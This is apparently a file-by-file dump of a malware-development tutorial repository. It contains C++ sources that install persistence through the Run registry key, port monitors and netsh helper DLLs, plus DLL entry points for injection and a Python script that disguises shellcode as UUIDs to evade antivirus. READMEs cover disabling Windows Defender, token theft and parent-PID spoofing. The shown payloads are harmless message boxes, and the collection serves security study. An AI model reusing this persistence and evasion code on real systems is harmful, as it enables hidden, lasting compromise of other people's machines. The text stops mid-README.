| #include 6 | 7 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 8 | MessageBoxA(NULL, "Meow-meow!","=^..^=", MB_OK); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /2022-04-20-malware-pers-1/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-20-malware-pers-1/hack.exe -------------------------------------------------------------------------------- /2022-04-20-malware-pers-1/pers.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | pers.cpp 3 | windows low level persistense via start folder registry key 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html 6 | */ 7 | #include 8 | #include 9 | 10 | int main(int argc, char* argv[]) { 11 | HKEY hkey = NULL; 12 | // malicious app 13 | const char* exe = "Z:\\2022-04-20-malware-pers-1\\hack.exe"; 14 | 15 | // startup 16 | LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0 , KEY_WRITE, &hkey); 17 | if (res == ERROR_SUCCESS) { 18 | // create new registry key 19 | RegSetValueEx(hkey, (LPCSTR)"hack", 0, REG_SZ, (unsigned char*)exe, strlen(exe)); 20 | RegCloseKey(hkey); 21 | } 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /2022-04-20-malware-pers-1/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-20-malware-pers-1/pers.exe -------------------------------------------------------------------------------- /2022-04-26-malware-pers-2/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 2. C++ malware implementation. 2 | 3 | Malware persistence technique - via screensavers. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html](https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html) 6 | -------------------------------------------------------------------------------- /2022-04-26-malware-pers-2/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | meow-meow messagebox 3 | author: @cocomelonc 4 | */ 5 | #include 6 | 7 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 8 | MessageBoxA(NULL, "Meow-meow!","=^..^=", MB_OK); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /2022-04-26-malware-pers-2/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-26-malware-pers-2/hack.exe -------------------------------------------------------------------------------- /2022-04-26-malware-pers-2/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-26-malware-pers-2/pers.exe -------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 3. C++ malware implementation. 2 | 3 | Malware persistence technique - via COM hijacking. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html](https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html) 6 | -------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-02-malware-pers-3/evil.dll -------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/evil.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-02-malware-pers-3/evil.reg -------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/orig.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-02-malware-pers-3/orig.reg -------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-02-malware-pers-3/pers.exe -------------------------------------------------------------------------------- /2022-05-09-malware-pers-4/README.md: -------------------------------------------------------------------------------- 1 | # Malware development persistence tricks - part 4. C++ implementation. 2 | 3 | Simple but efficient persistence technique - via Windows Services. C++ implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html](https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html) 6 | -------------------------------------------------------------------------------- /2022-05-09-malware-pers-4/meow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-09-malware-pers-4/meow.exe -------------------------------------------------------------------------------- /2022-05-09-malware-pers-4/meowsrv.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-09-malware-pers-4/meowsrv.exe -------------------------------------------------------------------------------- /2022-05-16-malware-pers-5/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 5. C++ malware implementation. 2 | 3 | Malware persistence technique - via AppInit DLLs. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html](https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html) 6 | -------------------------------------------------------------------------------- /2022-05-16-malware-pers-5/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | inject via Appinit_DLLs 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | extern "C" { 12 | __declspec(dllexport) BOOL WINAPI runMe(void) { 13 | MessageBoxA(NULL, "Meow-meow!", "=^..^=", MB_OK); 14 | return TRUE; 15 | } 16 | } 17 | 18 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 19 | switch (nReason) { 20 | case DLL_PROCESS_ATTACH: 21 | runMe(); 22 | break; 23 | case DLL_PROCESS_DETACH: 24 | break; 25 | case DLL_THREAD_ATTACH: 26 | break; 27 | case DLL_THREAD_DETACH: 28 | break; 29 | } 30 | return TRUE; 31 | } 32 | -------------------------------------------------------------------------------- /2022-05-16-malware-pers-5/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-16-malware-pers-5/evil.dll -------------------------------------------------------------------------------- /2022-05-16-malware-pers-5/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-16-malware-pers-5/pers.exe -------------------------------------------------------------------------------- /2022-05-29-malware-pers-6/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 6. C++ malware implementation. 2 | 3 | Malware persistence technique - via NetSh helper DLL. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html](https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html) 6 | -------------------------------------------------------------------------------- /2022-05-29-malware-pers-6/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for netsh 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html 6 | */ 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2022-05-29-malware-pers-6/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-29-malware-pers-6/evil.dll -------------------------------------------------------------------------------- /2022-05-29-malware-pers-6/evil2.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil2.cpp 3 | simple DLL for netsh 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | DWORD WINAPI Meow(LPVOID lpParameter) { 12 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 13 | return 1; 14 | } 15 | 16 | extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved) { 17 | HANDLE hl = CreateThread(NULL, 0, Meow, NULL, 0, NULL); 18 | CloseHandle(hl); 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- /2022-05-29-malware-pers-6/evil2.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-29-malware-pers-6/evil2.dll -------------------------------------------------------------------------------- /2022-05-29-malware-pers-6/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-29-malware-pers-6/pers.exe -------------------------------------------------------------------------------- /2022-06-05-malware-av-evasion-7/README.md: -------------------------------------------------------------------------------- 1 | # Malware AV evasion. Disable Windows Defender. 2 | 3 | Simple PoC AV evasion. Disable Windows Defender via Registry keys. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/06/05/malware-av-evasion-7.html](https://cocomelonc.github.io/tutorial/2022/06/05/malware-av-evasion-7.html) 6 | 7 | -------------------------------------------------------------------------------- /2022-06-05-malware-av-evasion-7/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-05-malware-av-evasion-7/hack.exe -------------------------------------------------------------------------------- /2022-06-12-malware-pers-7/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 7. C++ malware implementation. 2 | 3 | Simple malware persistence technique - via Winlogon registry keys. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html](https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html) 6 | -------------------------------------------------------------------------------- /2022-06-12-malware-pers-7/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | meow-meow messagebox 3 | author: @cocomelonc 4 | */ 5 | #include 6 | 7 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 8 | MessageBoxA(NULL, "Meow-meow!","=^..^=", MB_OK); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /2022-06-12-malware-pers-7/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-12-malware-pers-7/hack.exe -------------------------------------------------------------------------------- /2022-06-12-malware-pers-7/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-12-malware-pers-7/pers.exe -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 8. C++ malware implementation. 2 | 3 | Malware persistence technique - via Port Monitors. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/06/19/malware-pers-8.html](https://cocomelonc.github.io/tutorial/2022/06/19/malware-pers-8.html) 6 | -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/detect.ps1: -------------------------------------------------------------------------------- 1 | Get-ChildItem -recurse HKLM:\SYSTEM\CurrentControlSet\Control\Print | Get-ItemProperty | where { $_ -match "\\\\(.*)\\(.*).dll" } 2 | -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for port monitor persistence 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2022/06/19/malware-pers-8.html 6 | */ 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-19-malware-pers-8/evil.dll -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/evil2.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-19-malware-pers-8/evil2.dll -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/monitor.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | monitor.cpp 3 | windows persistence via port monitors 4 | register the monitor port 5 | author: @cocomelonc 6 | https://cocomelonc.github.io/tutorial/2022/06/19/malware-pers-8.html 7 | */ 8 | #include "windows.h" 9 | #pragma comment(lib, "winspool") 10 | 11 | int main(int argc, char* argv[]) { 12 | MONITOR_INFO_2 mi; 13 | mi.pName = "Monitor"; 14 | mi.pEnvironment = "Windows x64"; 15 | mi.pDLLName = "evil.dll"; 16 | // mi.pDLLName = "evil2.dll"; 17 | AddMonitor(NULL, 2, (LPBYTE)&mi); 18 | return 0; 19 | } 20 | -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/monitor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-19-malware-pers-8/monitor.exe -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-19-malware-pers-8/pers.exe -------------------------------------------------------------------------------- /2022-06-27-malware-injection-20/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick. EnumDesktopsA. C++ malware implementation. 2 | 3 | Malware development: shellcode run via EnumDesktopsA. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/06/27/malware-injection-20.html](https://cocomelonc.github.io/tutorial/2022/06/27/malware-injection-20.html) 6 | -------------------------------------------------------------------------------- /2022-06-27-malware-injection-20/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-27-malware-injection-20/hack.exe -------------------------------------------------------------------------------- /2022-07-13-malware-injection-21/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick. EnumChildWindows. C++ malware implementation. 2 | 3 | Malware development: shellcode run via EnumChildWindows. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/07/14/malware-injection-21.html](https://cocomelonc.github.io/malware/2022/07/14/malware-injection-21.html) 6 | -------------------------------------------------------------------------------- /2022-07-13-malware-injection-21/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-07-13-malware-injection-21/hack.exe -------------------------------------------------------------------------------- /2022-07-21-malware-tricks-22/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick. Run payload as Lazarus Group. C++ malware implementation. 2 | 3 | Malware development: shellcode run via UuidFromStringA and EnumDesktopA (or another suitable candidate). C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/07/21/malware-tricks-22.html](https://cocomelonc.github.io/malware/2022/07/21/malware-tricks-22.html) 6 | -------------------------------------------------------------------------------- /2022-07-21-malware-tricks-22/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-07-21-malware-tricks-22/hack.exe -------------------------------------------------------------------------------- /2022-07-21-malware-tricks-22/meow.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-07-21-malware-tricks-22/meow.bin -------------------------------------------------------------------------------- /2022-07-21-malware-tricks-22/payload_uuid.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/python3 2 | 3 | from uuid import UUID 4 | import argparse 5 | 6 | parser = argparse.ArgumentParser() 7 | parser.add_argument('-p','--payload', required = True, help = "payload: binary file") 8 | args = vars(parser.parse_args()) 9 | pbin = args['payload'] 10 | 11 | with open(pbin, "rb") as f: 12 | # read in 16 bytes from our input payload 13 | chunk = f.read(16) 14 | while chunk: 15 | # if the chunk is less than 16 bytes then we pad the difference (x90) 16 | if len(chunk) < 16: 17 | padding = 16 - len(chunk) 18 | chunk = chunk + (b"\x90" * padding) 19 | print(UUID(bytes_le=chunk)) 20 | chunk = f.read(16) 21 | -------------------------------------------------------------------------------- /2022-07-29-malware-av-evasion-8/README.md: -------------------------------------------------------------------------------- 1 | # Malware AV evasion - part 8. Encode via Z85. C++ malware implementation. 2 | 3 | Malware AV evasion. Encoding payload via Z85 algorithm. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html](https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html) 6 | -------------------------------------------------------------------------------- /2022-07-29-malware-av-evasion-8/encode.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-07-29-malware-av-evasion-8/encode.exe -------------------------------------------------------------------------------- /2022-07-29-malware-av-evasion-8/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-07-29-malware-av-evasion-8/hack.exe -------------------------------------------------------------------------------- /2022-08-16-malware-av-evasion-9/README.md: -------------------------------------------------------------------------------- 1 | # Malware AV evasion part 9. base64 + RC4. C++ malware implementation. 2 | 3 | Malware AV evasion. Encrypt base64 encoded payload via RC4 algorithm. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/08/16/malware-av-evasion-9.html](https://cocomelonc.github.io/malware/2022/08/16/malware-av-evasion-9.html) 6 | -------------------------------------------------------------------------------- /2022-08-16-malware-av-evasion-9/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-08-16-malware-av-evasion-9/hack.exe -------------------------------------------------------------------------------- /2022-08-16-malware-av-evasion-9/meow.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-08-16-malware-av-evasion-9/meow.bin -------------------------------------------------------------------------------- /2022-08-26-malware-pers-9/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 9. C++ malware implementation. 2 | 3 | Malware persistence technique - via hijacking default file association. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html](https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html) 6 | -------------------------------------------------------------------------------- /2022-08-26-malware-pers-9/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | hack.cpp 3 | evil app for windows persistence via 4 | hijacking default file extension 5 | author: @cocomelonc 6 | https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html 7 | */ 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 12 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /2022-08-26-malware-pers-9/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-08-26-malware-pers-9/hack.exe -------------------------------------------------------------------------------- /2022-08-26-malware-pers-9/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-08-26-malware-pers-9/pers.exe -------------------------------------------------------------------------------- /2022-08-26-malware-pers-9/test.txt: -------------------------------------------------------------------------------- 1 | meow-meow test -------------------------------------------------------------------------------- /2022-09-06-malware-tricks-23/README.md: -------------------------------------------------------------------------------- 1 | # Malware development tricks. Parent PID spoofing. C++ malware implementation. 2 | 3 | Malware development: parent PID spoofing + APC injection. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html](https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html) 6 | -------------------------------------------------------------------------------- /2022-09-06-malware-tricks-23/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-06-malware-tricks-23/hack.exe -------------------------------------------------------------------------------- /2022-09-10-malware-pers-10/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 10. C++ malware implementation. 2 | 3 | Malware persistence technique - via IFEO. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html](https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html) 6 | -------------------------------------------------------------------------------- /2022-09-10-malware-pers-10/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | hack.cpp 3 | evil app for windows persistence via IFEO 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html 6 | */ 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2022-09-10-malware-pers-10/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-10-malware-pers-10/hack.exe -------------------------------------------------------------------------------- /2022-09-10-malware-pers-10/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-10-malware-pers-10/pers.exe -------------------------------------------------------------------------------- /2022-09-10-malware-pers-10/pers2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-10-malware-pers-10/pers2.exe -------------------------------------------------------------------------------- /2022-09-15-malware-av-evasion-10/README.md: -------------------------------------------------------------------------------- 1 | # Malware AV/VM evasion - part 10. C++ malware implementation. 2 | 3 | Malware AV/VM evasion. Anti-debugging via NtGlobalFlag. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/09/15/malware-av-evasion-10.html](https://cocomelonc.github.io/malware/2022/09/15/malware-av-evasion-10.html) 6 | -------------------------------------------------------------------------------- /2022-09-15-malware-av-evasion-10/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-15-malware-av-evasion-10/hack.exe -------------------------------------------------------------------------------- /2022-09-20-malware-pers-11/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 11. C++ malware implementation. 2 | 3 | Malware persistence technique - via Powershell profile. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/09/20/malware-pers-11.html](https://cocomelonc.github.io/tutorial/2022/09/20/malware-pers-11.html) 6 | -------------------------------------------------------------------------------- /2022-09-20-malware-pers-11/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | hack.cpp 3 | evil app for windows 4 | persistence via powershell profile 5 | author: @cocomelonc 6 | https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html 7 | */ 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 12 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /2022-09-20-malware-pers-11/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-20-malware-pers-11/hack.exe -------------------------------------------------------------------------------- /2022-09-20-malware-pers-11/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-20-malware-pers-11/pers.exe -------------------------------------------------------------------------------- /2022-09-25-token-theft-1/README.md: -------------------------------------------------------------------------------- 1 | # APT techniques: Access Token manipulation. C++ malware implementation. 2 | 3 | APT techniques: Access Token Manipulation. Token theft. C++ implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/09/25/token-theft-1.html](https://cocomelonc.github.io/tutorial/2022/09/25/token-theft-1.html) 6 | -------------------------------------------------------------------------------- /2022-09-25-token-theft-1/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-25-token-theft-1/hack.exe -------------------------------------------------------------------------------- /2022-09-30-malware-pers-12/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 12. C++ malware implementation. 2 | 3 | Malware persistence technique - via Accessibility Features. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/09/30/malware-pers-12.html](https://cocomelonc.github.io/malware/2022/09/30/malware-pers-12.html) 6 | -------------------------------------------------------------------------------- /2022-09-30-malware-pers-12/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | hack.cpp 3 | evil app for windows persistence 4 | via Accessibility Features 5 | author: @cocomelonc 6 | https://cocomelonc.github.io/malware/2022/09/30/malware-pers-12.html 7 | */ 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 12 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /2022-09-30-malware-pers-12/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-30-malware-pers-12/hack.exe -------------------------------------------------------------------------------- /2022-09-30-malware-pers-12/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-30-malware-pers-12/pers.exe -------------------------------------------------------------------------------- /2022-10-04-malware-pers-13/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 13. C++ malware implementation. 2 | 3 | Malware persistence technique - via hijacking uninstall application. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/10/04/malware-pers-13.html](https://cocomelonc.github.io/malware/2022/10/04/malware-pers-13.html) 6 | -------------------------------------------------------------------------------- /2022-10-04-malware-pers-13/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | hack.cpp 3 | evil app for windows persistence via 4 | hijacking uninstall app 5 | author: @cocomelonc 6 | https://cocomelonc.github.io/malware/2022/10/04/malware-pers-13.html 7 | */ 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 12 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /2022-10-04-malware-pers-13/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-04-malware-pers-13/hack.exe -------------------------------------------------------------------------------- /2022-10-04-malware-pers-13/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-04-malware-pers-13/pers.exe -------------------------------------------------------------------------------- /2022-10-09-malware-pers-14/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 14. C++ malware implementation. 2 | 3 | Malware persistence technique - update Event Viewer Log Help link. C++ malware implementation 